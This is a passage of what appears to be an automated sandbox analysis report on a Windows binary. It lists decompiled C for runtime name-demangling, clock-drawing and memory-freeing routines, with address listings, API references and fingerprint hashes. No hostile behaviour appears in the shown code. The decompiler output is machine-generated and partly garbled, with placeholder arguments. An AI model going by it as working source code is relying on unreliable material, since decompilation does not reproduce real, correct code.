                                                                                                      											if(E0040B5E8( &_v132,  &_v123, 0x64) != 0) {
                                                                                                      												_t110 = _v123;
                                                                                                      												_v124 = _t110;
                                                                                                      												if(_t110 != 0x2d) {
                                                                                                      													_v123 = 0x2e;
                                                                                                      												} else {
                                                                                                      													_v123 = _v122;
                                                                                                      													_v122 = 0x2e;
                                                                                                      												}
                                                                                                      												_push( &_v140);
                                                                                                      												_push(_t152);
                                                                                                      												_t101 = E00407674(E00407048( &_v196,  &_v124),  &_v164, 0x65);
                                                                                                      												L19:
                                                                                                      												E00407652(_t101);
                                                                                                      											} else {
                                                                                                      												goto L13;
                                                                                                      											}
                                                                                                      										}
                                                                                                      									} else {
                                                                                                      										if(_t151 != 0) {
                                                                                                      											L13:
                                                                                                      											_push(2);
                                                                                                      											L14:
                                                                                                      											E00407082(_t152);
                                                                                                      										} else {
                                                                                                      											L7:
                                                                                                      											E0040B56E(_t150,  &_v132);
                                                                                                      											if(( *0x4376e4 & 0x00004000) == 0) {
                                                                                                      												L36:
                                                                                                      												_t133 =  &_v16;
                                                                                                      												_push( &_v132);
                                                                                                      												_push( &_v140);
                                                                                                      												if(_t116 != 0x44) {
                                                                                                      													_push("`non-type-template-parameter");
                                                                                                      												} else {
                                                                                                      													_push("`template-parameter");
                                                                                                      												}
                                                                                                      												E00407652(E00407048(_t133));
                                                                                                      												E004076B8( &_v140, _t152, "\'");
                                                                                                      											} else {
                                                                                                      												E0040B5E8( &_v132,  &_v24, 0x10);
                                                                                                      												_t87 =  *0x4376ec(E0040F7EF( &_v24));
                                                                                                      												if(_t87 == 0) {
                                                                                                      													goto L36;
                                                                                                      												} else {
                                                                                                      													_push(_t87);
                                                                                                      													L22:
                                                                                                      													E00407048(_t152);
                                                                                                      												}
                                                                                                      											}
                                                                                                      										}
                                                                                                      									}
                                                                                                      								}
                                                                                                      							}
                                                                                                      						}
                                                                                                      					}
                                                                                                      				}
                                                                                                      				return E004023FF(_t116, _v8 ^ _t153, _t150, _t151, _t152);
                                                                                                      			}




































                                                                                                      0x0040ba7d
                                                                                                      0x0040ba86
                                                                                                      0x0040ba8d
                                                                                                      0x0040ba90
                                                                                                      0x0040ba97
                                                                                                      0x0040ba9a
                                                                                                      0x0040ba9c
                                                                                                      0x0040ba9e
                                                                                                      0x0040baa1
                                                                                                      0x0040baa6
                                                                                                      0x0040baa9
                                                                                                      0x0040bc1e
                                                                                                      0x0040bccb
                                                                                                      0x0040bcd6
                                                                                                      0x0040bce9
                                                                                                      0x0040bcf3
                                                                                                      0x0040bcf3
                                                                                                      0x0040bcf8
                                                                                                      0x0040bcfb
                                                                                                      0x0040bd29
                                                                                                      0x0040bd3a
                                                                                                      0x0040bd44
                                                                                                      0x00000000
                                                                                                      0x0040bcfd
                                                                                                      0x0040bcfd
                                                                                                      0x0040bcfe
                                                                                                      0x0040bd09
                                                                                                      0x0040bd1a
                                                                                                      0x0040bd24
                                                                                                      0x00000000
                                                                                                      0x0040bd00
                                                                                                      0x0040bd00
                                                                                                      0x0040bd01
                                                                                                      0x0040bd49
                                                                                                      0x0040bd5a
                                                                                                      0x0040bd03
                                                                                                      0x0040bd03
                                                                                                      0x0040bd04
                                                                                                      0x00000000
                                                                                                      0x0040bd06
                                                                                                      0x0040bd07
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x0040bd07
                                                                                                      0x0040bd04
                                                                                                      0x0040bd01
                                                                                                      0x0040bcfe
                                                                                                      0x0040bd65
                                                                                                      0x0040bc24
                                                                                                      0x0040bc27
                                                                                                      0x00000000
                                                                                                      0x0040bc2d
                                                                                                      0x0040bc30
                                                                                                      0x0040bc40
                                                                                                      0x0040bc4b
                                                                                                      0x0040bc54
                                                                                                      0x0040bc62
                                                                                                      0x0040bc6a
                                                                                                      0x0040bc32
                                                                                                      0x0040bc35
                                                                                                      0x0040bc72
                                                                                                      0x0040bc75
                                                                                                      0x0040bc79
                                                                                                      0x0040bc37
                                                                                                      0x0040bc3a
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x0040bc3a
                                                                                                      0x0040bc35
                                                                                                      0x0040bc30
                                                                                                      0x0040bc27
                                                                                                      0x0040baaf
                                                                                                      0x0040baaf
                                                                                                      0x0040bc14
                                                                                                      0x00000000
                                                                                                      0x0040bab5
                                                                                                      0x0040bab5
                                                                                                      0x0040bab8
                                                                                                      0x0040bc07
                                                                                                      0x00000000
                                                                                                      0x0040babe
                                                                                                      0x0040babe
                                                                                                      0x0040bac1
                                                                                                      0x0040bbfb
                                                                                                      0x0040bc00
                                                                                                      0x0040bac7
                                                                                                      0x0040bac7
                                                                                                      0x0040bac8
                                                                                                      0x0040bbc0
                                                                                                      0x0040bbe6
                                                                                                      0x0040bbe7
                                                                                                      0x0040bbf3
                                                                                                      0x00000000
                                                                                                      0x0040bbc2
                                                                                                      0x0040bbc3
                                                                                                      0x0040bbc8
                                                                                                      0x00000000
                                                                                                      0x0040bbc8
                                                                                                      0x0040bace
                                                                                                      0x0040bace
                                                                                                      0x0040bacf
                                                                                                      0x0040bb26
                                                                                                      0x0040bb32
                                                                                                      0x0040bb3d
                                                                                                      0x0040bc0c
                                                                                                      0x0040bc0c
                                                                                                      0x00000000
                                                                                                      0x0040bb50
                                                                                                      0x0040bb60
                                                                                                      0x0040bb70
                                                                                                      0x0040bb73
                                                                                                      0x0040bb78
                                                                                                      0x0040bb86
                                                                                                      0x0040bb7a
                                                                                                      0x0040bb7d
                                                                                                      0x0040bb80
                                                                                                      0x0040bb80
                                                                                                      0x0040bb90
                                                                                                      0x0040bb91
                                                                                                      0x0040bbac
                                                                                                      0x0040bbb1
                                                                                                      0x0040bbb3
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x0040bb60
                                                                                                      0x0040bad1
                                                                                                      0x0040bad4
                                                                                                      0x0040bb62
                                                                                                      0x0040bb62
                                                                                                      0x0040bb64
                                                                                                      0x0040bb66
                                                                                                      0x0040bada
                                                                                                      0x0040bada
                                                                                                      0x0040bade
                                                                                                      0x0040baee
                                                                                                      0x0040bc85
                                                                                                      0x0040bc88
                                                                                                      0x0040bc8b
                                                                                                      0x0040bc92
                                                                                                      0x0040bc96
                                                                                                      0x0040bcbf
                                                                                                      0x0040bc98
                                                                                                      0x0040bc98
                                                                                                      0x0040bc98
                                                                                                      0x0040bca4
                                                                                                      0x0040bcb5
                                                                                                      0x0040baf4
                                                                                                      0x0040bafd
                                                                                                      0x0040bb0c
                                                                                                      0x0040bb16
                                                                                                      0x00000000
                                                                                                      0x0040bb1c
                                                                                                      0x0040bb1c
                                                                                                      0x0040bbcd
                                                                                                      0x0040bbcf
                                                                                                      0x0040bbcf
                                                                                                      0x0040bb16
                                                                                                      0x0040baee
                                                                                                      0x0040bad4
                                                                                                      0x0040bacf
                                                                                                      0x0040bac8
                                                                                                      0x0040bac1
                                                                                                      0x0040bab8
                                                                                                      0x0040baaf
                                                                                                      0x0040bd7c

                                                                                                      APIs
                                                                                                      • DName::getString.LIBCMT ref: 0040BAFD
                                                                                                        • Part of subcall function 0040B5E8: _HeapManager::getMemory.LIBCMT ref: 0040B60B
                                                                                                        • Part of subcall function 0040F7EF: __wcstoi64.LIBCMT ref: 0040F7F9
                                                                                                      • DName::DName.LIBCMT ref: 0040BCCB
                                                                                                      • UnDecorator::getDecoratedName.LIBCMT ref: 0040BCDF
                                                                                                      • DName::operator+=.LIBCMT ref: 0040BCE9
                                                                                                      • DName::operator+=.LIBCMT ref: 0040BCF3
                                                                                                      • UnDecorator::getSignedDimension.LIBCMT ref: 0040BD10
                                                                                                      • DName::operator+=.LIBCMT ref: 0040BD1A
                                                                                                      • DName::operator+=.LIBCMT ref: 0040BD24
                                                                                                      • UnDecorator::getSignedDimension.LIBCMT ref: 0040BADE
                                                                                                        • Part of subcall function 0040B56E: DName::DName.LIBCMT ref: 0040B583
                                                                                                      • UnDecorator::getSignedDimension.LIBCMT ref: 0040BB26
                                                                                                      • UnDecorator::getSignedDimension.LIBCMT ref: 0040BB32
                                                                                                      • DName::getString.LIBCMT ref: 0040BB59
                                                                                                      • DName::DName.LIBCMT ref: 0040BB66
                                                                                                      • DName::DName.LIBCMT ref: 0040BBA5
                                                                                                      • DName::operator+.LIBCMT ref: 0040BBAC
                                                                                                      • DName::operator+.LIBCMT ref: 0040BBB3
                                                                                                      • DName::DName.LIBCMT ref: 0040BBCF
                                                                                                      • UnDecorator::getDecoratedName.LIBCMT ref: 0040BBE0
                                                                                                      • DName::DName.LIBCMT ref: 0040BBF3
                                                                                                      • UnDecorator::getSignedDimension.LIBCMT ref: 0040BBFB
                                                                                                      • UnDecorator::getDecoratedName.LIBCMT ref: 0040BC14
                                                                                                      • UnDecorator::getZName.LIBCMT ref: 0040BC4B
                                                                                                      • UnDecorator::getSignedDimension.LIBCMT ref: 0040BC54
                                                                                                      • DName::DName.LIBCMT ref: 0040BC9D
                                                                                                      • DName::operator+.LIBCMT ref: 0040BCA4
                                                                                                      • DName::operator+.LIBCMT ref: 0040BCB5
                                                                                                      • UnDecorator::getSignedDimension.LIBCMT ref: 0040BD30
                                                                                                      • DName::operator+=.LIBCMT ref: 0040BD3A
                                                                                                      • DName::operator+=.LIBCMT ref: 0040BD44
                                                                                                      • UnDecorator::getSignedDimension.LIBCMT ref: 0040BD50
                                                                                                      • DName::operator+=.LIBCMT ref: 0040BD5A
                                                                                                      • DName::operator+.LIBCMT ref: 0040BD65
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.256448974.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.256423838.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000002.00000002.256635443.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000002.00000002.256647032.0000000000435000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000002.00000002.256660274.0000000000439000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000002.00000002.256692564.000000000044E000.00000002.00020000.sdmp Download File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_RpcNs4.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Decorator::get$Name$DimensionSigned$Name::Name::operator+=$Name::operator+$Decorated$Name::getString$HeapManager::getMemory__wcstoi64
                                                                                                      • String ID: .$.$NULL$`non-type-template-parameter$`template-parameter
                                                                                                      • API String ID: 794994914-3945972591
                                                                                                      • Opcode ID: 1c2fea9a4649ad5569de1717745718e8fbf6f0c4d96ecaba2659b31418f3cf6a
                                                                                                      • Instruction ID: 201b8f6032eaa1f4d38bc2e805cd0a82f907350239d40423b13d8945d61c76b7
                                                                                                      • Opcode Fuzzy Hash: 1c2fea9a4649ad5569de1717745718e8fbf6f0c4d96ecaba2659b31418f3cf6a
                                                                                                      • Instruction Fuzzy Hash: 6B8180719045089AEB24E779CC56BEEB768EB11314F50447FE042B31D2DF7C6A448B9E
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      C-Code - Quality: 60%
                                                                                                      			E00401460(void* __ecx) {
                                                                                                      				signed int _v8;
                                                                                                      				struct _SYSTEMTIME _v24;
                                                                                                      				struct HDC__* _v28;
                                                                                                      				signed int _v32;
                                                                                                      				void* __ebx;
                                                                                                      				void* __edi;
                                                                                                      				void* __esi;
                                                                                                      				signed int _t60;
                                                                                                      				signed short _t65;
                                                                                                      				void* _t105;
                                                                                                      				signed int _t109;
                                                                                                      				signed int _t120;
                                                                                                      				signed int _t123;
                                                                                                      				signed int _t125;
                                                                                                      				void* _t127;
                                                                                                      				signed int _t128;
                                                                                                      				struct HDC__* _t130;
                                                                                                      				signed int _t133;
                                                                                                      				signed int _t136;
                                                                                                      				struct HDC__* _t137;
                                                                                                      				signed int _t140;
                                                                                                      				signed int _t141;
                                                                                                      
                                                                                                      				_t60 =  *0x435040; // 0x4b97bcea
                                                                                                      				_v8 = _t60 ^ _t141;
                                                                                                      				_t105 = __ecx;
                                                                                                      				_t130 = GetDC( *(__ecx + 0x18));
                                                                                                      				_v28 = _t130;
                                                                                                      				GetLocalTime( &_v24);
                                                                                                      				StretchBlt(_t130, 0, 0, 0x6f, 0x15,  *(_t105 + 0x10), 0xaa, 0, 2, 0x15, 0xcc0020);
                                                                                                      				if( *((char*)(_t105 + 0x1c)) != 0) {
                                                                                                      					_t65 = _v24.wHour;
                                                                                                      					_t120 = _t65 & 0x0000ffff;
                                                                                                      					if(_t65 > 0xc) {
                                                                                                      						_t120 = _t120 - 0xc;
                                                                                                      					}
                                                                                                      					_t109 = (0x66666667 * _t120 >> 0x20 >> 2 >> 0x1f) + (0x66666667 * _t120 >> 0x20 >> 2);
                                                                                                      					_v32 = _t120 - _t109 + _t109 * 4 + _t109 + _t109 * 4;
                                                                                                      					BitBlt(_t130, 2, 0, 0xd, 0x15,  *(_t105 + 0x10), _t109 * 0xd, 0, 0xcc0020);
                                                                                                      					BitBlt(_t130, 0xf, 0, 0xd, 0x15,  *(_t105 + 0x10), _v32 * 0xd, 0, 0xcc0020);
                                                                                                      				} else {
                                                                                                      					_t128 = _v24.wHour & 0x0000ffff;
                                                                                                      					_t140 = (0x66666667 * _t128 >> 0x20 >> 2 >> 0x1f) + (0x66666667 * _t128 >> 0x20 >> 2);
                                                                                                      					BitBlt(_v28, 2, 0, 0xd, 0x15,  *(_t105 + 0x10), _t140 * 0xd, 0, 0xcc0020);
                                                                                                      					BitBlt(_v28, 0xf, 0, 0xd, 0x15,  *(_t105 + 0x10), (_t128 - _t140 + _t140 * 4 + _t140 + _t140 * 4) * 0xd, 0, 0xcc0020);
                                                                                                      				}
                                                                                                      				_t123 = _v24.wMinute & 0x0000ffff;
                                                                                                      				_t133 = (0x66666667 * _t123 >> 0x20 >> 2 >> 0x1f) + (0x66666667 * _t123 >> 0x20 >> 2);
                                                                                                      				BitBlt(_v28, 0x23, 0, 0xd, 0x15,  *(_t105 + 0x10), _t133 * 0xd, 0, 0xcc0020);
                                                                                                      				BitBlt(_v28, 0x30, 0, 0xd, 0x15,  *(_t105 + 0x10), (_t123 - _t133 + _t133 * 4 + _t133 + _t133 * 4) * 0xd, 0, 0xcc0020);
                                                                                                      				_t125 = _v24.wSecond & 0x0000ffff;
                                                                                                      				_t117 = 0x66666667 * _t125 >> 0x20 >> 2;
                                                                                                      				_t136 = (0x66666667 * _t125 >> 0x20 >> 2 >> 0x1f) + (0x66666667 * _t125 >> 0x20 >> 2);
                                                                                                      				BitBlt(_v28, 0x44, 0, 0xd, 0x15,  *(_t105 + 0x10), _t136 * 0xd, 0, 0xcc0020);
                                                                                                      				_t137 = _v28;
                                                                                                      				_t127 = BitBlt;
                                                                                                      				BitBlt(_t137, 0x51, 0, 0xd, 0x15,  *(_t105 + 0x10), (_t125 - _t136 + _t136 * 4 + _t136 + _t136 * 4) * 0xd, 0, 0xcc0020);
                                                                                                      				_push(0xcc0020);
                                                                                                      				_push(0);
                                                                                                      				if(_v24.wMilliseconds <= 0x1f4) {
                                                                                                      					BitBlt(_t137, 0x1c, 0, 7, 0x15,  *(_t105 + 0x10), 0xa3, ??, ??);
                                                                                                      					_push(0xcc0020);
                                                                                                      					_push(0);
                                                                                                      					_push(0xa3);
                                                                                                      				} else {
                                                                                                      					BitBlt(_t137, 0x1c, 0, 7, 0x15,  *(_t105 + 0x10), 0x9c, ??, ??);
                                                                                                      					_push(0xcc0020);
                                                                                                      					_push(0);
                                                                                                      					_push(0x9c);
                                                                                                      				}
                                                                                                      				BitBlt(_t137, 0x3d, 0, 7, 0x15,  *(_t105 + 0x10), ??, ??, ??);
                                                                                                      				if( *((char*)(_t105 + 0x1c)) == 1) {
                                                                                                      					_push(0xcc0020);
                                                                                                      					_push(0);
                                                                                                      					if(_v24.wHour < 0xc) {
                                                                                                      						_push(0x82);
                                                                                                      					} else {
                                                                                                      						_push(0x8f);
                                                                                                      					}
                                                                                                      					BitBlt(_t137, 0x60, 0, 0xd, 0x15,  *(_t105 + 0x10), ??, ??, ??);
                                                                                                      				}
                                                                                                      				ReleaseDC( *(_t105 + 0x18), _t137);
                                                                                                      				return E004023FF(_t105, _v8 ^ _t141, _t117, _t127, _t137);
                                                                                                      			}

























                                                                                                      0x00401466
                                                                                                      0x0040146d
                                                                                                      0x00401472
                                                                                                      0x0040147e
                                                                                                      0x00401484
                                                                                                      0x00401487
                                                                                                      0x004014a9
                                                                                                      0x004014b3
                                                                                                      0x00401511
                                                                                                      0x00401515
                                                                                                      0x00401521
                                                                                                      0x00401523
                                                                                                      0x00401523
                                                                                                      0x00401535
                                                                                                      0x00401543
                                                                                                      0x00401559
                                                                                                      0x00401573
                                                                                                      0x004014b5
                                                                                                      0x004014b5
                                                                                                      0x004014cd
                                                                                                      0x004014e3
                                                                                                      0x00401509
                                                                                                      0x00401509
                                                                                                      0x00401575
                                                                                                      0x0040158d
                                                                                                      0x004015a3
                                                                                                      0x004015c9
                                                                                                      0x004015cf
                                                                                                      0x004015df
                                                                                                      0x004015e7
                                                                                                      0x004015fd
                                                                                                      0x00401606
                                                                                                      0x00401617
                                                                                                      0x0040162a
                                                                                                      0x00401631
                                                                                                      0x00401636
                                                                                                      0x0040163c
                                                                                                      0x00401670
                                                                                                      0x00401672
                                                                                                      0x00401677
                                                                                                      0x00401679
                                                                                                      0x0040163e
                                                                                                      0x0040164f
                                                                                                      0x00401651
                                                                                                      0x00401656
                                                                                                      0x00401658
                                                                                                      0x00401658
                                                                                                      0x0040168a
                                                                                                      0x00401690
                                                                                                      0x00401697
                                                                                                      0x0040169c
                                                                                                      0x0040169e
                                                                                                      0x004016a7
                                                                                                      0x004016a0
                                                                                                      0x004016a0
                                                                                                      0x004016a0
                                                                                                      0x004016b8
                                                                                                      0x004016b8
                                                                                                      0x004016be
                                                                                                      0x004016d4

                                                                                                      APIs
                                                                                                      • GetDC.USER32(?), ref: 00401478
                                                                                                      • GetLocalTime.KERNEL32(?), ref: 00401487
                                                                                                      • StretchBlt.GDI32(00000000,00000000,00000000,0000006F,00000015,?,000000AA,00000000,00000002,00000015,00CC0020), ref: 004014A9
                                                                                                      • BitBlt.GDI32(?,00000002,00000000,0000000D,00000015,?,66666667,00000000,00CC0020), ref: 004014E3
                                                                                                      • BitBlt.GDI32(?,0000000F,00000000,0000000D,00000015,?,00000000,00000000,00CC0020), ref: 00401509
                                                                                                      • BitBlt.GDI32(00000000,00000002,00000000,0000000D,00000015,?,66666667,00000000,00CC0020), ref: 00401559
                                                                                                      • BitBlt.GDI32(00000000,0000000F,00000000,0000000D,00000015,?,00000000,00000000,00CC0020), ref: 00401573
                                                                                                      • BitBlt.GDI32(?,00000023,00000000,0000000D,00000015,?,66666667,00000000,00CC0020), ref: 004015A3
                                                                                                      • BitBlt.GDI32(?,00000030,00000000,0000000D,00000015,?,00000000,00000000,00CC0020), ref: 004015C9
                                                                                                      • BitBlt.GDI32(?,00000044,00000000,0000000D,00000015,?,66666667,00000000,00CC0020), ref: 004015FD
                                                                                                      • BitBlt.GDI32(?,00000051,00000000,0000000D,00000015,?,00000000,00000000,00CC0020), ref: 0040162A
                                                                                                      • BitBlt.GDI32(?,0000001C,00000000,00000007,00000015,?,0000009C,00000000,00CC0020), ref: 0040164F
                                                                                                      • BitBlt.GDI32(?,0000001C,00000000,00000007,00000015,?,000000A3,00000000,00CC0020), ref: 00401670
                                                                                                      • BitBlt.GDI32(?,0000003D,00000000,00000007,00000015,?,000000A3,00000000,00CC0020), ref: 0040168A
                                                                                                      • BitBlt.GDI32(?,00000060,00000000,0000000D,00000015,?,00000082,00000000,00CC0020), ref: 004016B8
                                                                                                      • ReleaseDC.USER32 ref: 004016BE
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.256448974.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.256423838.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000002.00000002.256635443.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000002.00000002.256647032.0000000000435000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000002.00000002.256660274.0000000000439000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000002.00000002.256692564.000000000044E000.00000002.00020000.sdmp Download File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_RpcNs4.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: LocalReleaseStretchTime
                                                                                                      • String ID: gfff$gfff$gfff$gfff$@bw
                                                                                                      • API String ID: 3873728368-1481070139
                                                                                                      • Opcode ID: 2bac2e643f9ae310b9b1c5671be892aa5c7a774fda8b0812f5c359b49242290a
                                                                                                      • Instruction ID: 8369255b4d5222c7f4210ed0fb5063c9b8c6610f14c435b30fd9e32c564ce736
                                                                                                      • Opcode Fuzzy Hash: 2bac2e643f9ae310b9b1c5671be892aa5c7a774fda8b0812f5c359b49242290a
                                                                                                      • Instruction Fuzzy Hash: B4717332B80708BBFB349F55DD0BF6A7A69EB84B00F150065FB10BE1D2D2F599109B99
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      C-Code - Quality: 75%
                                                                                                      			E0040392E(void* __eax, void* __ebx) {
                                                                                                      				intOrPtr _t5;
                                                                                                      				intOrPtr _t6;
                                                                                                      				intOrPtr _t7;
                                                                                                      				intOrPtr _t8;
                                                                                                      				void* _t9;
                                                                                                      				void* _t14;
                                                                                                      				void* _t24;
                                                                                                      				intOrPtr* _t25;
                                                                                                      				signed int _t26;
                                                                                                      				signed int _t27;
                                                                                                      				intOrPtr _t39;
                                                                                                      
                                                                                                      				_t14 = __ebx;
                                                                                                      				__imp__DecodePointer( *0x438c08);
                                                                                                      				_t25 =  *0x436d08; // 0x0
                                                                                                      				_t24 = __eax;
                                                                                                      				if(_t25 == 0) {
                                                                                                      					L4:
                                                                                                      					_push(_t14);
                                                                                                      					E00402CB3(_t25);
                                                                                                      					_t26 =  *0x436d04; // 0x61e680
                                                                                                      					 *0x436d08 = 0;
                                                                                                      					if(_t26 == 0) {
                                                                                                      						L8:
                                                                                                      						E00402CB3(_t26);
                                                                                                      						 *0x436d04 = 0;
                                                                                                      						E00402CB3( *0x436d00);
                                                                                                      						_t5 = E00402CB3( *0x436cfc);
                                                                                                      						_t27 = _t26 | 0xffffffff;
                                                                                                      						 *0x436d00 = 0;
                                                                                                      						 *0x436cfc = 0;
                                                                                                      						if(_t24 != _t27) {
                                                                                                      							_t39 =  *0x438c08; // 0x8487d1c6
                                                                                                      							if(_t39 != 0) {
                                                                                                      								_t5 = E00402CB3(_t24);
                                                                                                      							}
                                                                                                      						}
                                                                                                      						__imp__EncodePointer(_t27);
                                                                                                      						 *0x438c08 = _t5;
                                                                                                      						_t6 =  *0x437774; // 0x0
                                                                                                      						if(_t6 != 0) {
                                                                                                      							E00402CB3(_t6);
                                                                                                      							 *0x437774 = 0;
                                                                                                      						}
                                                                                                      						_t7 =  *0x437778; // 0x0
                                                                                                      						if(_t7 != 0) {
                                                                                                      							E00402CB3(_t7);
                                                                                                      							 *0x437778 = 0;
                                                                                                      						}
                                                                                                      						_t8 =  *0x435794; // 0x626c30
                                                                                                      						asm("lock xadd [eax], esi");
                                                                                                      						if(_t27 != 1) {
                                                                                                      							L18:
                                                                                                      							return _t8;
                                                                                                      						} else {
                                                                                                      							_t8 =  *0x435794; // 0x626c30
                                                                                                      							if(_t8 == 0x435570) {
                                                                                                      								goto L18;
                                                                                                      							}
                                                                                                      							_t9 = E00402CB3(_t8);
                                                                                                      							 *0x435794 = 0x435570;
                                                                                                      							return _t9;
                                                                                                      						}
                                                                                                      					}
                                                                                                      					while( *_t26 != 0) {
                                                                                                      						E00402CB3( *_t26);
                                                                                                      						_t26 = _t26 + 4;
                                                                                                      						if(_t26 != 0) {
                                                                                                      							continue;
                                                                                                      						}
                                                                                                      						break;
                                                                                                      					}
                                                                                                      					_t26 =  *0x436d04; // 0x61e680
                                                                                                      					goto L8;
                                                                                                      				}
                                                                                                      				while( *_t25 != 0) {
                                                                                                      					E00402CB3( *_t25);
                                                                                                      					_t25 = _t25 + 4;
                                                                                                      					if(_t25 != 0) {
                                                                                                      						continue;
                                                                                                      					}
                                                                                                      					break;
                                                                                                      				}
                                                                                                      				_t25 =  *0x436d08; // 0x0
                                                                                                      				goto L4;
                                                                                                      			}














                                                                                                      0x0040392e
                                                                                                      0x00403936
                                                                                                      0x0040393c
                                                                                                      0x00403942
                                                                                                      0x00403946
                                                                                                      0x00403960
                                                                                                      0x00403960
                                                                                                      0x00403962
                                                                                                      0x00403967
                                                                                                      0x0040396f
                                                                                                      0x00403978
                                                                                                      0x00403991
                                                                                                      0x00403992
                                                                                                      0x0040399d
                                                                                                      0x004039a3
                                                                                                      0x004039ae
                                                                                                      0x004039b3
                                                                                                      0x004039b6
                                                                                                      0x004039bf
                                                                                                      0x004039c7
                                                                                                      0x004039c9
                                                                                                      0x004039cf
                                                                                                      0x004039d2
                                                                                                      0x004039d7
                                                                                                      0x004039cf
                                                                                                      0x004039d9
                                                                                                      0x004039df
                                                                                                      0x004039e4
                                                                                                      0x004039eb
                                                                                                      0x004039ee
                                                                                                      0x004039f4
                                                                                                      0x004039f4
                                                                                                      0x004039fa
                                                                                                      0x00403a01
                                                                                                      0x00403a04
                                                                                                      0x00403a0a
                                                                                                      0x00403a0a
                                                                                                      0x00403a10
                                                                                                      0x00403a15
                                                                                                      0x00403a1b
                                                                                                      0x00403a3a
                                                                                                      0x00403a3a
                                                                                                      0x00403a1d
                                                                                                      0x00403a1d
                                                                                                      0x00403a29
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00403a2c
                                                                                                      0x00403a32
                                                                                                      0x00000000
                                                                                                      0x00403a32
                                                                                                      0x00403a1b
                                                                                                      0x0040397a
                                                                                                      0x00403980
                                                                                                      0x00403986
                                                                                                      0x00403989
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00403989
                                                                                                      0x0040398b
                                                                                                      0x00000000
                                                                                                      0x0040398b
                                                                                                      0x00403948
                                                                                                      0x0040394f
                                                                                                      0x00403955
                                                                                                      0x00403958
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00000000
                                                                                                      0x00403958
                                                                                                      0x0040395a
                                                                                                      0x00000000

                                                                                                      APIs
                                                                                                      • DecodePointer.KERNEL32 ref: 00403936
                                                                                                      • _free.LIBCMT ref: 0040394F
                                                                                                        • Part of subcall function 00402CB3: HeapFree.KERNEL32(00000000,00000000,?,00406DD2,00000000,?,?,00404371,00402B70,00434230,00000014), ref: 00402CC7
                                                                                                        • Part of subcall function 00402CB3: GetLastError.KERNEL32(xuC,?,00406DD2,00000000,?,?,00404371,00402B70,00434230,00000014), ref: 00402CD9
                                                                                                      • _free.LIBCMT ref: 00403962
                                                                                                      • _free.LIBCMT ref: 00403980
                                                                                                      • _free.LIBCMT ref: 00403992
                                                                                                      • _free.LIBCMT ref: 004039A3
                                                                                                      • _free.LIBCMT ref: 004039AE
                                                                                                      • _free.LIBCMT ref: 004039D2
                                                                                                      • EncodePointer.KERNEL32(0061E680), ref: 004039D9
                                                                                                      • _free.LIBCMT ref: 004039EE
                                                                                                      • _free.LIBCMT ref: 00403A04
                                                                                                      • _free.LIBCMT ref: 00403A2C
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.256448974.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.256423838.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000002.00000002.256635443.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000002.00000002.256647032.0000000000435000.00000004.00020000.sdmp Download File
                                                                                                      • Associated: 00000002.00000002.256660274.0000000000439000.00000002.00020000.sdmp Download File
                                                                                                      • Associated: 00000002.00000002.256692564.000000000044E000.00000002.00020000.sdmp Download File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_400000_RpcNs4.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _free$Pointer$DecodeEncodeErrorFreeHeapLast
                                                                                                      • String ID: 0lb$pUC
                                                                                                      • API String ID: 3064303923-4201871394
                                                                                                      • Opcode ID: 9e368f96e69a788bf5f9fe72ec27c00b85b73d030a192da84a46a16c3714cec0
                                                                                                      • Instruction ID: 2d5ff0e81fdfeecdb028d6274274e2617790129ccf2f9e9fb2bc5b6500c7a3d5
                                                                                                      • Opcode Fuzzy Hash: 9e368f96e69a788bf5f9fe72ec27c00b85b73d030a192da84a46a16c3714cec0
                                                                                                      • Instruction Fuzzy Hash: F121D0B2A05652ABEB225F25FE4455A7BA8FB00321715607FF844B73E0CB785D408F9C
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      C-Code - Quality: 77%
                                                                                                      			E00413B7F(void* __ebx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                                                      				void* __edi;
                                                                                                      				void* __esi;
                                                                                                      				void* __ebp;
                                                                                                      				intOrPtr _t12;
                                                                                                      				intOrPtr _t13;
                                                                                                      				intOrPtr _t15;
                                                                                                      				intOrPtr _t22;
                                                                                                      				intOrPtr* _t42;
                                                                                                      
                                                                                                      				if(_a4 > 5 || _a8 == 0) {
                                                                                                      					L4:
                                                                                                      					return 0;
                                                                                                      				} else {
